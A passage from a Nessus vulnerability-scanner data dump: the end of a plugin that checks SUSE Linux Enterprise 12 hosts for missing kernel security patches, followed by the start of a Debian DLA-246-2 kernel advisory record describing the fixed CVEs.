(bsc#933904).\n\n - CVE-2014-9729: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to a crash\n (bsc#933904).\n\n - CVE-2014-9730: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to a crash\n (bsc#933904).\n\n - CVE-2014-9731: Kernel built with the UDF file\n system(CONFIG_UDF_FS) support were vulnerable to\n information leakage (bsc#933896).\n\nThe update package also includes non-security fixes. See advisory for\ndetails.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=854817\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=854824\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=858727\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=866911\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=867362\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=895814\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=903279\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=907092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=908491\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=915183\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=917630\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=918618\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=921430\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924071\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924526\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926369\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=926953\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=927455\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=927697\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=927786\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=928131\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929696\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929879\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=929974\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930092\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930399\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930579\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930599\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=930972\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931124\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931403\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931538\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931620\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931860\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=931988\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932348\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932793\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932897\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932898\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932899\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932900\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=932967\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933117\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933429\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933637\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933896\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933904\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=933907\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=934160\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935083\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935085\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935088\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935174\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935542\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935881\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=935918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936012\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936423\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936445\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936446\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936502\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936556\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936831\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936875\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937087\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937609\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937612\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937613\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=937616\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=938022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=938023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=938024\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9728/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9729/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9730/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2014-9731/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-1805/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-3212/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4036/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4167/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-4692/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5364/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2015-5366/\"\n );\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151324-1.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?1dcc37f6\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12 :\n\nzypper in -t patch SUSE-SLE-WE-12-2015-356=1\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-356=1\n\nSUSE Linux Enterprise Server 12 :\n\nzypper in -t patch SUSE-SLE-SERVER-12-2015-356=1\n\nSUSE Linux Enterprise Module for Public Cloud 12 :\n\nzypper in -t patch SUSE-SLE-Module-Public-Cloud-12-2015-356=1\n\nSUSE Linux Enterprise Live Patching 12 :\n\nzypper in -t patch SUSE-SLE-Live-Patching-12-2015-356=1\n\nSUSE Linux Enterprise Desktop 12 :\n\nzypper in -t patch SUSE-SLE-DESKTOP-12-2015-356=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-extra-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-default-man\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/07/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/08/03\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", cpu:\"s390x\", reference:\"kernel-default-man-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-base-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-debugsource-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-default-devel-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"kernel-syms-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-debugsource-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-devel-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-default-extra-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-syms-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.12.44-52.10.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"0\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.12.44-52.10.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"SUSE Linux Enterprise 12 kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-12T09:43:32", "description": "The linux-2.6 update issued as DLA-246-1 caused regressions. This\nupdate corrects the defective patches applied in that update causing\nthese problems. For reference the original advisory text follows.\n\nThis update fixes the CVEs described below.\n\nCVE-2011-5321\n\nJiri Slaby discovered that tty_driver_lookup_tty() may leak a\nreference to the tty driver. A local user could use this flaw to crash\nthe system.\n\nCVE-2012-6689\n\nPablo Neira Ayuso discovered that non-root user-space processes can\nsend forged Netlink notifications to other processes. A local user\ncould use this flaw for denial of service or privilege escalation.\n\nCVE-2014-3184\n\nBen Hawkes discovered that various HID drivers may over-read the\nreport descriptor buffer, possibly resulting in a crash if a HID with\na crafted descriptor is plugged in.\n\nCVE-2014-8159\n\nIt was found that the Linux kernel's InfiniBand/RDMA subsystem did not\nproperly sanitize input parameters while registering memory regions\nfrom user space via the (u)verbs API. A local user with access to a\n/dev/infiniband/uverbsX device could use this flaw to crash the system\nor, potentially, escalate their privileges on the system.\n\nCVE-2014-9683\n\nDmitry Chernenkov discovered that eCryptfs writes past the end of the\nallocated buffer during encrypted filename decoding, resulting in\nlocal denial of service.\n\nCVE-2014-9728 / CVE-2014-9729 / CVE-2014-9730 / CVE-2014-9731 /\nCVE-2015-4167\n\nCarl Henrik Lunde discovered that the UDF implementation is missing\nseveral necessary length checks. A local user that can mount devices\ncould use these various flaws to crash the system, to leak information\nfrom the kernel, or possibly for privilege escalation.\n\nCVE-2015-1805\n\nRed Hat discovered that the pipe iovec read and write implementations\nmay iterate over the iovec twice but will modify the iovec such that\nthe second iteration accesses the wrong memory. A local user could use\nthis flaw to crash the system or possibly for privilege escalation.\nThis may also result in data corruption and information leaks in pipes\nbetween non-malicious processes.\n\nCVE-2015-2041\n\nSasha Levin discovered that the LLC subsystem exposed some variables\nas sysctls with the wrong type. On a 64-bit kernel, this possibly\nallows privilege escalation from a process with CAP_NET_ADMIN\ncapability; it also results in a trivial information leak.\n\nCVE-2015-2042\n\nSasha Levin discovered that the RDS subsystem exposed some variables\nas sysctls with the wrong type. On a 64-bit kernel, this results in a\ntrivial information leak.\n\nCVE-2015-2830\n\nAndrew Lutomirski discovered that when a 64-bit task on an amd64\nkernel makes a fork(2) or clone(2) system call using int $0x80, the\n32-bit compatibility flag is set (correctly) but is not cleared on\nreturn. As a result, both seccomp and audit will misinterpret the\nfollowing system call by the task(s), possibly leading to a violation\nof security policy.\n\nCVE-2015-2922\n\nModio AB discovered that the IPv6 subsystem would process a router\nadvertisement that specifies no route but only a hop limit, which\nwould then be applied to the interface that received it. This can\nresult in loss of IPv6 connectivity beyond the local network.\n\nThis may be mitigated by disabling processing of IPv6 router\nadvertisements if they are not needed: sysctl\nnet.ipv6.conf.default.accept_ra=0 sysctl\nnet.ipv6.conf.<interface>.accept_ra=0\n\nCVE-2015-3339\n\nIt was found that the execve(2) system call can race with inode\nattribute changes made by chown(2). Although chown(2) clears the\nsetuid/setgid bits of a file if it changes the respective owner ID,\nthis race condition could result in execve(2) setting effective\nuid/gid to the new owner ID, a privilege escalation.\n\nFor the oldoldstable distribution (squeeze), these problems have been\nfixed in version 2.6.32-48squeeze12.\n\nFor the oldstable distribution (wheezy), these problems were fixed in\nlinux version 3.2.68-1+deb7u1 or earlier, except for CVE-2015-1805 and\nCVE-2015-4167 which will be fixed soon.\n\nFor the stable distribution (jessie), these problems were fixed in\nlinux version 3.16.7-ckt11-1 or earlier, except for CVE-2015-4167\nwhich will be fixed later.\n\nWe recommend that you upgrade your linux-2.6 packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 19, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-06-18T00:00:00", "title": "Debian DLA-246-2 : linux-2.6 regression update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2830", "CVE-2015-2922", "CVE-2015-3339", "CVE-2014-9728", "CVE-2014-9730", "CVE-2014-8159", "CVE-2011-5321", "CVE-2012-6689", "CVE-2014-9729", "CVE-2014-9683", "CVE-2015-4167", "CVE-2015-2041", "CVE-2014-9731", "CVE-2014-3184", "CVE-2015-2042", "CVE-2015-1805"], "modified": "2015-06-18T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64-dbg", "cpe:/o:debian:debian_linux:6.0", "p-cpe:/a:debian:debian_linux:firmware-linux-free", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-vserver", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-amd64", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-686", "p-cpe:/a:debian:debian_linux:linux-doc-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-openvz-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-manual-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-openvz", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common-xen", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-common", "p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-source-2.6.32", "p-cpe:/a:debian:debian_linux:linux-patch-debian-2.6.32", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-486", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-amd64-dbg", "p-cpe:/a:debian:debian_linux:linux-base", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-openvz-686-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-all-i386", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-486", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-amd64", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-xen-amd64", "p-cpe:/a:debian:debian_linux:linux-support-2.6.32-5", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686-bigmem", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-vserver-amd64", "p-cpe:/a:debian:debian_linux:linux-tools-2.6.32", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-xen-686-dbg", "p-cpe:/a:debian:debian_linux:linux-headers-2.6.32-5-vserver-686", "p-cpe:/a:debian:debian_linux:linux-libc-dev", "p-cpe:/a:debian:debian_linux:xen-linux-system-2.6.32-5-xen-686", "p-cpe:/a:debian:debian_linux:linux-image-2.6.32-5-686"], "id": "DEBIAN_DLA-246.NASL", "href": "https://www.tenable.com/plugins/nessus/84252", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-246-2. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84252);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2011-5321\", \"CVE-2012-6689\", \"CVE-2014-3184\", \"CVE-2014-8159\", \"CVE-2014-9683\", \"CVE-2014-9728\", \"CVE-2014-9729\", \"CVE-2014-9730\", \"CVE-2014-9731\", \"CVE-2015-1805\", \"CVE-2015-2041\", \"CVE-2015-2042\", \"CVE-2015-2830\", \"CVE-2015-2922\", \"CVE-2015-3339\", \"CVE-2015-4167\");\n script_bugtraq_id(69768, 72643, 72729, 72730, 72739, 73060, 73141, 73699, 74243, 74315, 74951, 74963, 74964, 75001);\n\n script_name(english:\"Debian DLA-246-2 : linux-2.6 regression update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The linux-2.6 update issued as DLA-246-1 caused regressions. This\nupdate 